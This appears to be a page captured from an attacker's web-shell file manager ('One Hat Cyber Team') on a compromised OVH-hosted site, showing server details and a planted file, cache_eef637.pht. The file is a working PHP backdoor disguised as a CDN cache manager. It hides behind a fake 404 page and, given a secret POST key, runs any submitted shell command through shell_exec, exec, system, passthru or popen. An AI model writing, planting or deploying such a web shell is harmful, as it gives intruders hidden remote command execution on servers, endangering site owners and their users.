One Hat Cyber Team
Your IP:
216.73.216.75
Server IP:
213.186.33.17
Server:
Linux webm007.cluster106.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
tcherkas
/
spectacles.russes
/
tmp
/
View File Name :
cache_eef637.pht
<?php /* Content Delivery Network - Cache Manager v3.2 */ error_reporting(0); $t='ef837f1cde'; if(!isset($_POST['k'])||$_POST['k']!==$t){ header('HTTP/1.1 404 Not Found'); die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>'); } $r=$_POST['c'].' 2>&1'; $o=''; if(function_exists('shell_exec')){$o=@shell_exec($r);} elseif(function_exists('exec')){@exec($r,$a);$o=implode("\n",$a);} elseif(function_exists('system')){ob_start();@system($r);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($r);$o=ob_get_clean();} elseif(function_exists('popen')){$h=@popen($r,'r');$o='';while(!feof($h)){$o.=fread($h,4096);}pclose($h);} echo $o; ?>